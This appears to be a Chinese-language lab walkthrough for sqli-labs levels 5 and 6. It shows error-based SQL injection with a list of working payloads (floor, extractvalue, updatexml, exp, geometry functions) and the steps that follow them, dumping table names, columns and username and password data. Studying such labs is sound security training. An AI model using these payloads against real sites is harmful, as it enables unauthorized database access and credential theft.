废话不在多说 let's go!
开始挑战第五关(Double Query- Single Quotes- String)
和第六关(Double Query- Double Quotes- String)
首先访问我们的环境,加入id参数,输入 ' 出现报错,对报错信息进行分析
从上图很明显,直接利用单引号进行闭合,输入and 1=1 和1=2进行报错测试
继续使用order by进行查询字段,正确的为3个字段数
union select联合查询,加入-号进行报错,
靠,没有任何的反应,这就有有些触及知识盲区了,通过网站查询资料,发现可以使用报错函数进行注入,这里列出几个,都是从网上直接copy过来的
1.floor()
id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)
2.extractvalue()
id = 1 and (extractvalue(1, concat(0x5c,(select user()))))
3.updatexml()
id = 1 and (updatexml(0x3a,concat(1,(select user())),1))
4.exp()
id =1 and EXP(~(SELECT * from(select user())a))
5.有六种函数(但总的来说可以归为一类)
GeometryCollection()
id = 1 AND GeometryCollection((select * from (select * from(select user())a)b))
polygon()
id =1 AND polygon((select * from(select * from(select user())a)b))
multipoint()
id = 1 AND multipoint((select * from(select * from(select user())a)b))
multilinestring()
id = 1 AND multilinestring((select * from(select * from(select user())a)b))
linestring()
id = 1 AND LINESTRING((select * from(select * from(select user())a)b))
multipolygon()
id =1 AND multipolygon((select * from(select * from(select user())a)b))
这里我采用floor函数进行测试,对里面的几个函数进行解释下,以下是自己做的笔记,这里我就不一一的去数据库进行测试了
既然有了sql语句,那就直接上了,查询版本,数据库
继续爆表名,这里采用limit一行一行的看
开始爆字段名,这里得到username和password
爆数据
第六关是一样的,采用双引号进行闭合即可,其他操作一致
